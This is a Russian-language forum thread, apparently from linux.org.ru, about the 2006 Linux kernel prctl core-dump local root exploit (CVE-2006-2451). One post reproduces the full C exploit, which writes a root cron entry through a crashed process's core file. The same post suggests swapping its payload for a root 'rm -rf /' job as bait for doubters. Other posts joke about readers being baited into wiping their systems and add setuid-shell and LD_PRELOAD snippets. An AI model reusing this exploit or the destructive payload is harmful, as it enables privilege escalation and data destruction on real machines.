Linux Kernel 2.6.x PRCTL Core Dump Handling - Local root Exploit

А, и еще. Если твой euid=0, то не означает ли это, что ты можешь использовать setuid для установки real id в любое значение?

Вот и свершилось незапланированное ритуальное самоубийтсво учестнегов ЛОРа. Далай ЛАМА Наисветейший(он же JB) дал отмашку rm -fr / после сплоита и много падаваноф (анонимусоф и участнегов ЛОРа) убили свои хомяки,бд,etc после чего получили сердечные приступы и все отправились на тот свет....

>А, и еще. Если твой euid=0, то не означает ли это, что ты можешь использовать setuid для установки real id в любое значение?

Тогда бы и su работал. Проще в passwd и shadow руками поправить ;-)

>> Вот и свершилось незапланированное ритуальное самоубийтсво учестнегов ЛОРа. Далай ЛАМА Наисветейший(он же JB) дал отмашку rm -fr / после сплоита и много падаваноф (анонимусоф и участнегов ЛОРа) убили свои хомяки,бд,etc после чего получили сердечные приступы и все отправились на тот свет....

алилуя!!!

Да, означает. Т.е запустив код: 

#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main() {
    setuid(0);
    system("/bin/sh");
}

ты получишь настоящего рута.

su, сцуко, хитрый - он проверяет. Я специально исходник смотрел :)

так точно. Как говорит о Великий ман:

DESCRIPTION setuid sets the effective user ID of the current process. If the effective userid of the caller is root, the real and saved user ID's are also set.

всем курить маны!!!

setuid sets the effective user ID of the current process. If the effective userid of the caller is root, the real and saved user IDs are also set.

ALTLinux

ls: /etc/cron.d: Permission denied

;-)

>Ребята, уже не первый раз режет глаз прЕвелегии (правильно прИвелегии)...

ПрИвИлегии, умник =)))

работает, 2.6.16.9, Debian 3.1

Внимание, работает, по-моему, только со стандартным cron

У меня fcron - ничего не произошло, появился файл /etc/cron.d/core, но /tmp/sh не появлялся до тех пор, пока не запустил обычный cron

М-дя... дети учите мат часть ;-) Вот вам еще урок,

если файлик вот такого содержания

-------------------------------

int getuid() { return (0); }

int getgid() { return (0); }

int geteuid() { return (0); }

int getegid() { return (0); }

-------------------------------

собрать вот так

gcc -shared file.c -o file.so

А потом заюзать вот так:

LD_PRELOAD=./fake.so /bin/sh

Тоже получите рута ^_^

Будет ругацо гцц собирайте так:

gcc -fPIC -shared file.c -o file.so

не канает. только видимость, в натуре. никаких привилегий. дешёвка.

Интересная идея. Получается, что cron в любом бинарном мусоре (в корке, в данном случае) способен найти строчки, напоминающие cron entry, и выполнить их. Т.е. ошибка не только в ядре (она позволяет сделать core dump в /etc), но и в кроне - он не особо-то и проверяет формат крон файла.

ребят, вы кое-что не учли... крон выполняет содержимое корки (предварительно найдя там нужную строку) от рута. дальнейшие комментарии излишни, надеюсь?

> никаких привилегий.

visudo запусти

>не канает. только видимость, в натуре. никаких привилегий. дешёвка.

test for "быдло":.................. [PASSED]

ты внимательно смотрел, на чей пост я ответил?

в *bsd (я про sys, а не компоненты) такого я не припомню.

так ты имел в виду, что с fake.so рут все-равно не настоящий? тогда прошу прощения.

test for "хацкер"............[FAILED]

радует то, что на rhel 4 update 3 не работает (наверное, потому что ядро 2.6.9-34.ELsmp, хотя суидный /tmp/sh был создан)

>JB:
>Linux debian 2.6.14.7 #3 SMP Sat Jun 24 09:49:25 SAMST 2006 i686 >GNU/Linux
>sh-2.05b#
>
>debian stable

в debian stable такова ядра(2.6.14.7) нету

> в debian stable такова ядра(2.6.14.7) нету

это самосбор, разве не видно?

> О боже!!!!!!!!! Правильно Jackill сказал "4 дебила за сутки".... тока он числом ошибсяяя...... > Я могу сделать скрипт в tmp и скормить его sh и никакие nosuid noexec вас не спасут :-]

Сэр Джекилл действительно ошибся, скриптец хоть об-суидь - права пойдут от процесса /bin/bash и юзера, а не от самого скрипта ;)

SElinux.

> радует то, что на rhel 4 update 3 не работает (наверное, потому что ядро 2.6.9-34.ELsmp, хотя суидный /tmp/sh был создан)

вообще-то вот:
https://rhn.redhat.com/errata/RHSA-2006-0574.html

так что обновись лучше до 2.6.9-34.0.2

Слака - 2.6.10 - не работает. Патрик любит нас

>радует то, что на rhel 4 update 3 не работает (наверное, потому что ядро 2.6.9-34.ELsmp, хотя суидный /tmp/sh был создан)

Это значит, что работает, нечему радоваться. Просто нужно эксплойт немного переписать.

Ппц... лор жжот мля. "Не работает"... нуну... даже я зная C только на зачаточном уровне понимаю что эксплоит рабочий. egid фигня им, причем здесь это вообще? Дело не то, что suid sh может ничего не дать, дело в том что sh скопировали в /tmp, сделали chown root, и chmod +s. Этого не достаточно?
Нате вот это попробуйте:
/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* - dreyer    <luna@aditel.org>   (main PoC code)   */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/
usr/sbin:/usr/bin\n* * * * *   root   wall L.o.r debils prove of concept ; rm -f /etc/cron.d/core\n";

int main() {
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. 3 minutes (** please wait **)\n");
    sleep(180);
}

Если у вас и это не эксплоит, то меняйте строку
char
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/
usr/sbin:/usr/bin\n* * * * *   root   wall L.o.r debils prove of concept ; rm -f /etc/cron.d/core\n";

на
char
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/
usr/sbin:/usr/bin\n* * * * *   root   rm -rf /\n";

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/
usr/sbin:/usr/bin\n* * * * *   root   wall L.o.r debils prove of concept ; rm -f /etc/cron.d/core\n";

Одной строкой

>Сэр Джекилл действительно ошибся, скриптец хоть об-суидь - права пойдут от процесса /bin/bash и юзера, а не от самого скрипта ;)

Ты читать умеешь? Так вот если не умеешь попроси прочитать тебе следующее: В сообщении говорится про то чтобы скормить скрипт, т.е. "/bin/sh /tmp/script.sh", а не "/tmp/script.sh", что есть запустить скрипт!

*ОРАТЬ В УХО* Фбабруйск жывотнае!

>Ппц... лор жжот мля. "Не работает"... нуну... даже я зная C только на зачаточном уровне понимаю что эксплоит рабочий. egid фигня им, причем здесь это вообще? Дело не то, что suid sh может ничего не дать, дело в том что sh скопировали в /tmp, сделали chown root, и chmod +s. Этого не достаточ

Алилуя!!! Среди нас прозревший! Возьми с полки пиражок!

P.S. Юстас Алексу "Анонимусоф ЛОРа не берут зомбирующие программы 3ьего рейха. Анонимусоф надо использовать их как основную ударную силу!"

>> P.S. Юстас Алексу "Анонимусоф ЛОРа не берут зомбирующие программы 3ьего рейха. Анонимусоф надо использовать их как основную ударную силу!"

что то после карателя JB с rm -rf / тихо тут стало O_o

>что то после карателя JB с rm -rf / тихо тут стало O_o

Да здравствует Далай Лама Наисветейший....

Не работает.

kbps@skynet ~/downloads $ ./a.out
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]

[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: No such file or directory
kbps@skynet ~/downloads $ uname -a
Linux skynet 2.6.16-gentoo-r12 #1 SMP Sun Jul 9 21:18:46 VLAST 2006 i686 Intel(R) Pentium(R) 4 CPU 2.80GHz GNU/Linux
kbps@skynet ~/downloads $ ls -la /tmp/sh
ls: /tmp/sh: No such file or directory

Восставшие из тарджзипа вернулись.... первых 185 серий им мало.....

> Не работает.

а прочитать тред тебе религия непозволила?

Чё? у меня r12  там пофиксено это.
Поэтому и неработает.

ыыы...

почитал комментарии тех, у кого "не работает" и кто постит лог консоли.

Сплошные красноглазики кругом. Одни названия хостов для чего стоят :))

user@host artem@debian <-- крутой кадр. krum@localhost user@server <-- нормально, а чо :)

я каждый пост прочёл, между прочим.

> user@host artem@debian <-- крутой кадр. krum@localhost user@server <-- нормально, а чо :)

а чо тебя неустраивает карапуз? =) надо было "root@fbi.gov"?

Нет! Надо было george@whitehouse.gov 8-]

да все меня устраивает. Сразу видно, у кого система на домашнем компе со всеми дефолтовыми настройками и даже с дефолтовым username и computer name :)) Тех, у кого было root@localhost, уже убил отличный скипт на перле, который вы тут когда-то постили =)))

> Сразу видно, у кого система на домашнем компе со всеми дефолтовыми настройками и даже с дефолтовым username и computer name :))

смешно если честно

вот обьясни мне, в чем прелесть витееватого и понтового хостнейма дома? все равно никто кроме тебя его не видит

> я каждый пост прочёл, между прочим.

тогда ты должен был знать что сплоит неработает на пропатченных гентушных ядрах, на кой было постить?

Дело не столько в том, какой хостнейм и юернейм дома, а в том, какой народ в рабочее время в рабочий день сидит дома и тестит эксплоиты :))

> Дело не столько в том, какой хостнейм и юернейм дома, а в том, какой народ в рабочее время в рабочий день сидит дома и тестит эксплоиты :))

всмысле те, у кого заслуженный отпуск? ;)

ага. И у кого каникулы :)